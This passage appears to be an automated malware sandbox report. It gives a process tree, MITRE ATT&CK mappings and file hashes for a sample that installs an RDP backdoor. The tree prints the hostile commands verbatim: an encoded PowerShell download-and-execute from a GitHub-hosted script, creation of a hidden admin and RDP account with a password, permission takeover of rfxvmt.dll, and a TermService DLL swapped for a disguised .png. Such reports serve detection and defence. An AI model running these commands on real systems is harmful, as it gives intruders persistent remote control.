      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        7⤵
        Deletes itself
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wicfj5t\0wicfj5t.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99DA.tmp" "c:\Users\Admin\AppData\Local\Temp\0wicfj5t\CSCE2054757D164439A8B02386BEE11E4.TMP"
        9⤵
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
        
        C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2016
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4944
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2960
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3332
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4196
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1392
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2464
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        8⤵
        
        PID:4824
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        8⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:2028
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        8⤵
        
        PID:4808
        
        C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:212
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        9⤵
        
        PID:3992
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2880
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        9⤵
        
        PID:3508
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        10⤵
        
        PID:1976
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        11⤵
        
        PID:1120
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        8⤵
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        9⤵
        
        PID:4264
        
        C:\Windows\system32\net.exe
        
        net start TermService
        10⤵
        
        PID:3808
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        11⤵
        
        PID:2612
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        8⤵
        
        PID:4188
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        8⤵
        
        PID:3932
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1888

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:1376
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:1492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:3028

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 6iMLqmmF /add
1⤵
PID:2424
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 6iMLqmmF /add
  2⤵
  PID:3208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 6iMLqmmF /add
    3⤵
    PID:2200

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1940
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2928

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1356
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:404

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:624
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:4436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3896

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 6iMLqmmF
1⤵
PID:5036
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 6iMLqmmF
  2⤵
  PID:3840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 6iMLqmmF
    3⤵
    PID:3560

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1712
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4344

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2604
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4092

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3976
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0wicfj5t\0wicfj5t.dll

Filesize
3KB

MD5
bb912ccbeacfc8f0995ac4228c20d4db

SHA1
37b62c5875ccf3616363b40795904d02e40596c1

SHA256
7d467a0e7f30302bd72c4925a73df35c81dddba7e43df795c78cfc9195c4868a

SHA512
32cf3008d2dca9cb2369833a3c22cc1cfc67c51b97d95cfcb543c6e04494e174d9ed299c8dfa82d682df68791755dc6fc358030817e20930c4b5621a2bf1a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ali.xll

Filesize
478B

MD5
b4d19d9bc3a9710b2fb1ae0b624d1c41

SHA1
eeb5da66d4c03576e74ce3400a0e103c3d3ec03e

SHA256
149694d95fcdd48d6dc7d63c01277781fbf125e18021e053b33e3031e0b56ed2

SHA512
9e28bf58250c8f7a9c3678ea1e8e04c7c8a8f5d296a5aefd00e22cd2ea92e3290c7d97e3162c45c34b0e7df2d96da86e8eca7d06b29c727899ef49ed8e9838f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Cancello.xll

Filesize
6.0MB

MD5
94ebec40a2486771c57efa2fe07ae9da

SHA1
703f32b6c37b1911419d183f6f58b64c0eacdc65

SHA256
520f4f19ea3685af7c4ab2d80be0d1e25b1653a7b179aefee598c5d3982a7fb9

SHA512
9cf346200847548476a2b75d0abf763a06508d98d7e0f7eee6f42c92642852a4cb9e8315b05881336c16cf448e78bf60ca5ad3ea310744e692a08dad4eed9106

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com

Filesize
1.0MB

MD5
f83ab141e29899ceb5308dabde894a0e

SHA1
6ea46bb7102125fa5d39b77547dab28ec346e9f9

SHA256
ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99

SHA512
d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mie.xll

Filesize
988KB

MD5
870915fb6864a3860eb0169eb2fb8189

SHA1
6554c843886613c7f13d83209459a32f6490341f

SHA256
e62d564f38ba39e66793ac9438f2d8349f7724ee781f29f7baa211a084d254c5

SHA512
eaa44787524ee4bc7fdf7a012d3bb916e7062ee5dc943ead0f6ada81ee42be1113f56735c3923e27edb938ea2e91ff031d09d8518ea68d3eda2b2098477fcfb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vai.xll

Filesize
1.0MB

MD5
08f5912a8c695d475ecba490c52afd79

SHA1
bcd1446b4f5890ea711ff0da19c160d02208586e

SHA256
763e8f292c2cd633355cef302c05d61a95a0f3cde3d066256183fd6e070e8dd5

SHA512
83962e6336f61bb6d264a09e6ab5cad88961deb54046ee932df7cf5b395dbc87b644c0fd1e818c0c031674a432eeccb3e6af5f42be03bc5929656eaac1d1ff22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99DA.tmp

Filesize
1KB

MD5
c9f64ecf331dce2fd50fff1a4aed0f83

SHA1
c893b62d4d99c42315d1dea74e2a3eb623a11e2f

SHA256
8112bf99534f6490f247fb8d148fff3f65abe654e97c0b2867dfb7f1bf0eb737

SHA512
61ce379a114bece55f92e67615053cdf140c3fbedc0e1c326b9ca65791c86cd618ed525c2171a31652014dcabaaa43d72c70013240b7dd22b7d0f655294ba3b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fzwrdqny.gae.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
d98e1585ada81949fd216a4cb47a57a2

SHA1
9bfe5e6aecbd1f6fea39a53f79949b0d08678ee5

SHA256
8ac0505a68a72081897e5bfb0fa2a7398700d01a081753b4b70da0a310d04a7b

SHA512
41b5a6f1e31622ac5629a211e60abdeba5fc1011ba2b3c1f5827d2efd1ed8b7ad6abc2faa42f55f4674ab08e88ba8959805dfc36ebd209f7e01b2c8b884862e4

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
887d05438e05502e984ec2f4160c738b

SHA1
9c9a0f6cd829ddb8ed765db8aa47f451283f63ff

SHA256
e0593cae5c5fa1a2dc2012c49fe14dc6b1811fe28daaeb92d4fefe2673b57a24

SHA512
5ae8d6fe49ee4e490c9ba2f23f7b6be3a3e97ab720b03ff3e47d79d6bc2c3789f4d3d164b80390d1bdd8cdd4b1b8f4f4f12be2c110e48729db4fb5bea37227e8

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
6f81732c759f466521df693bd9df18f9

SHA1
dbb0d6a381bf80deabd3b5fb578d28c06ee50654

SHA256
6591a77683f361d0946c123b9c09b89ee92ba467f684cb1c110efe14b888d033

SHA512
a11296293262aa6a2a716205fd48b25a9865eb7130eba874ed2320bd5af2ba6be22e181e0139cb71758b53a004b542a93fc9b961dc4af6c204fe3364dd639570

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC07C.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wicfj5t\0wicfj5t.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wicfj5t\0wicfj5t.cmdline

Filesize
369B

MD5
c7273698d365a9e7524a1dcc4fd872e2

SHA1
ebe0f4f97949edccc23907b84a9176c4173335a7

SHA256
4c5af2da458772ee686542813fb891703b628a8e290a23feffd06a8e79ac8078

SHA512
ac65c8c3d4eb8e283894d50b25e1255e347563fa2eddf128431d66a41380bd0eefa6f62971f503ac203b3de29797914e828071431cde9aa2b86588a6f7610f27

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wicfj5t\CSCE2054757D164439A8B02386BEE11E4.TMP

Filesize
652B

MD5
70f39521a7700323011643846710fc0d

SHA1
440f3bb467b1c15f26e072334caab66bf8b4e6c8

SHA256
a71c6792db0fb0f94134d8f579446fb29b39931419abd022c517a79ccc9a20e1

SHA512
2c75c9fc053675b4e11a38173cbc2ec65fda42f7584c63520b34ca8ac45c95303c4f69a7921c45d03fd9e755c69a67d62e3624ede166f42c20a6fc5aac6093a9

Download Submit
memory/3516-27-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-30-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-162-0x000002C37C0D0000-0x000002C37C279000-memory.dmp

Filesize
1.7MB

Download
memory/3516-34-0x000002C37C0D0000-0x000002C37C279000-memory.dmp

Filesize
1.7MB

Download
memory/3516-31-0x000002C37BB20000-0x000002C37BF46000-memory.dmp

Filesize
4.1MB

Download
memory/3516-157-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-28-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-23-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-29-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/3516-26-0x000002C33B6C0000-0x000002C33BD18000-memory.dmp

Filesize
6.3MB

Download
memory/4968-41-0x0000019553D10000-0x0000019553D32000-memory.dmp

Filesize
136KB

Download
memory/4968-62-0x00000195546D0000-0x00000195548DA000-memory.dmp

Filesize
2.0MB

Download
memory/4968-61-0x0000019554340000-0x00000195544B6000-memory.dmp

Filesize
1.5MB

Download
memory/4968-58-0x0000019553340000-0x0000019553348000-memory.dmp

Filesize
32KB

Download